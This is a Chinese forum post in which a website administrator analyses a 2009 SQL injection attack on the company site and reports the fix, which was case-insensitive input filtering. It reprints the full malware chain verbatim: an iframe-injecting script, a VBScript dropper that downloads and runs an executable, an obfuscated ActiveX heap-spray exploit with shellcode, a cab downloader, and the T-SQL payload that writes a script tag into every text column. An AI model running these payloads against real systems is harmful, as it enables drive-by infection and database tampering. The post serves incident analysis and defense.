|
|
今天发现含公司的网站数据库所有的字符串字段中包含代码,内容如下:
<script src=http://ucmal.com/0.js></script>
打开这个js代码如下:
function setCookie(name,value)
{
var Days = 1;
var exp = new Date();
exp.setTime(exp.getTime() + Days*1*60*60*1000);//Days*24*60*60*1000;
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln("<iframe src='http://index.htm1.ws/117.htm?id=mg' width=100 height=0><\/iframe>");
setCookie("Lin","ok");
return null;
}
}
getCookie("Lin")
查看http://index.htm1.ws/117.htm?id=mg文件,代码如下:
<iframe src=http://htm1.ws/www/014.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/r2.htm width=100 height=0></iframe>
<iframe src=http://htm1.ws/www/bd.htm width=100 height=0></iframe>
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=360631815&logo=1"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1519290.js"></script>
对于下面三个文件,我们分析如下:
http://htm1.ws/www/014.htm页面
<script language=VBScript>
On Error Resume Next
Cike = "http://www.axgzba2.com/x/2.exe"
Set Cike2 = document.createElement("object")
Cikeid="clsid:"
Cikeidx="BD96"
Cikeid2="C556-65"
Cikeid3="A3-11D"
Cikeid4="0-98"
Cikeid5="3A-00C"
Cikeid6="04FC29E36"
Cike3="Microsoft.X"
Cike4="MLHTTp"
Cike2.SetAttribute "classid", Cikeid&Cikeidx&Cikeid2&Cikeid3&Cikeid4&Cikeid5&Cikeid6
Cike5=Cike3&Cike4
Set loveCike = Cike2.CreateObject(Cike5,"")
loveCike.Open "GET", Cike, False
loveCike.Send
Qq_123456="microsofts.pif"
Qq_123456s="microsofts.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456ssss="b.stream"
Q123456sssss=Q123456sss&Q123456ssss
Set chilam = Cike2.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
Qq_123456=chilam.BuildPath(yingying,Qq_123456)
Qq_123456s=chilam.BuildPath(yingying,Qq_123456s)
Set chilams = Cike2.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write loveCike.ResponseBody
chilams.Savetofile Qq_123456,2
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "Set LoveCike = CreateObject(""Wscript.Shell"")"&vbCrLf&"LoveCike.run ("""&Qq_123456&""")"
chilams.Savetofile Qq_123456s,2
chilams.Close
cute="Shell.Applica"
qq="tion"
Set cute_qq = Cike2.createobject(cute&qq,"")
Qq123456="O"
Qq123456s="p"
Qq123456ss="e"
Qq123456sss="n"
cute_qq.SHellExECuTe Qq_123456s,"","",Qq123456&Qq123456s&Qq123456ss&Qq123456sss,0
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body >
http://htm1.ws/www/r2.htm页面
<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT">
eval("\x.........\x0a")
</script>
evel执行的编码解开后是下面的程序:
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))
{while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('V v(){W l=p.U.o();3(l.e("r 6")==-1&&l.e("r 7")==-1)g;3(l.e("Q 5.")==-1)
g;s="R"+"X.I"+"Y"+"17.1";16{n=15 Z(s)}18(M){g}b=n.D("E");2="";h=d("%C%z%A%u");j(i=0;i<F*G;i++)2+="S";3(b.e("6.0.14.")==-1){3
(p.t.o()=="N-L")a=d("%K%H%f");8 3(p.t.o()=="19-13")a=d("%1b%1q%1p%f");8 g}8 3(b=="6.0.14.1s")a=d("%m%11%1n%f");8 3
(b=="6.0.14.1r")a=d("%m%11%u%f");8 3(b=="6.0.14.1t")a=d("%w%q%1u%f");8 3(b=="6.0.14.1o")a=d("%w%q%1d%f");8 3(b=="6.0.14.1a")
a=d("%1f%11%1g%m");8 g;3(b.e("6.0.10.")!=-1){j(i=0;i<4;i++)2=2+h;2=2+a}8 3(b.e("6.0.11.")!=-1){j(i=0;i<6;i++)2=2+h;2=2+a}8 3
(b.e("6.0.12.")!=-1){j(i=0;i<9;i++)2=2+h;2=2+a}8 3(b.e("6.0.14.")!=-1){j(i=0;i<10;i++)2=2+h;2=2+a}
y="1h\\\\1i";x="1j";k=2+y+x;1k(k.1m<1c)k+="1e";n.1l("c:\\\\B O\\\\J\\\\P.T",k,"",0,0)}v
();',62,93,'||Padding|if|||||else||ret|RealVersion||unescape|indexOf|60|return|JmpOver||for|PayLoad|user|63|Real|toLowerCase|
navigator|31|msie|VulObject|userLanguage|04|RealExploit|79|Shell|AdjESP|06|74|Program|75|PlayerProperty|PRODUCTVERSION|32|148
|a5||NetMeeting|7f|cn|error|zh|Files|TestSnd|nt|IER||wav|userAgent|function|var|PCtl|ERP|ActiveXObject||||us||new|try|Ctl|cat
ch|en|536|4f|0x8000|09|YuanGe|51|70|LLLL|XXXXXLD|TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIXkcdNkbUWLNkT44ubXvcKEpV
Nk3FGP7szUwCO9QYqQnMEckkp6FoMnWdThVXzRrTwxkqxKTMFcxZcpxkXoWKkoBUYwsnNk3nGTS3kmsVLKdL2klKQNwluSYMLK4DNkuSkuiS0uT2rLPmbOpnvNsTp
lrLc0QS5j1LRuVNPepxRE5PP3yPcTVcCpp0ahtLNksptLLK0p7llmNk1P5XxkViLKSpp4LMW0sLLKW0gLmEmonnbn4NHlXhOtKOKOkOosjLS4mSTlEtelKOHPLUv0
mogF7jVO0pZHPokOYo9oNkaD14ilLMpRLz7CKkPSPSpRHk7TBsKON0cmoOnxKNoz6nhhRsYokOkOncHluTOsfLwTE2YoJpMoqnIHkRPsM8qPiokO9oV2kOXPJHxWK
OYoIo2HD4cDbP5jdo4oqhD86NcQSHSWpzqrsQtnQspoRMToQgqgVOPb0r4nQu48qu7p|while|Import|length|08|543|a4|71|550|544|552|01'.split
('|'),0,{}))
http://htm1.ws/www/bd.htm页面
<html>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<SCRIPT LANGUAGE='JavaScript'>
function ResumeError() {
return true;
}
window.onerror = ResumeError;
</SCRIPT>
<script>
eval("\143\157\155\56\104\154\157\141\144\104\123\50\42\150\164\164\160\72\57\57\170\170\56\141\170\147\172\142\141\56\143
\157\155\57\167\167\57\167\145\142\62\56\143\141\142\42\54\40\42\167\145\142\56\145\170\145\42\54\40\60\51\73")
</script>
</html>
evel执行的编码解开后是下面的程序:
com.DloadDS("http://xx.axgzba.com/ww/web2.cab", "web.exe", 0);
在网上搜了搜<script src=http://ucmal.com/0.js></script>,那个人是是25下午开始入侵,看来我们也是第一批被攻破的,26号我们恢复数
据库之后正常,27号又次攻击,查找iis日志文件终于发现问题了,查到DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0x4400450....AS%20NVARCHAR(4000));EXEC(@S),搜了下上次看的帖子,有人回了,说的很正确,我用他
的方式实验了下,确实sql成功注入了,执行的sql语句为:
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,
b.name
from sysobjects a,
syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,['
+ @C + ']))+''<script src=http://ucmal.com/0.js></script>''' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
最后找其原因,我想我的conn文件里都有sql过滤啊,问什么没有过滤掉DECLARE呢,再看原来他是用的大写,我的sql过滤只过滤了小写,原因
就在这,郁闷,这么个问题都没考虑到,把传递的参数都转换成大写来过滤就没事了,问题终于解决了,受这攻击的人在26号时我在百度跟
google里搜也就2页,27在搜就猛增到十几页,一天不少网站被攻击,估计问题跟我的问题一样,没区分大小写。公司的网站是好了,我赶紧去改一下我的博客,在安全上再提高一下。 |
|
前程无忧官网首页 有什么好的平台可以
最新的销售平台 互联网营销的平台有哪
制作网页的基本流程 网页制作和网页设
【帝国CMS】输出带序号的列表(数字排
织梦 建站 织梦网站模版后台怎么更改
云服务官网 哪些网站有免费的简历模板
如何建网站要什么条件 建网站要用什么
吉林市移动公司电话 吉林省退休人员网
|小黑屋|最新主题|手机版|微赢网络技术论坛
( 苏ICP备08020429号 )
IP卡
狗仔卡
发表于 2009-11-29 02:19:41
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡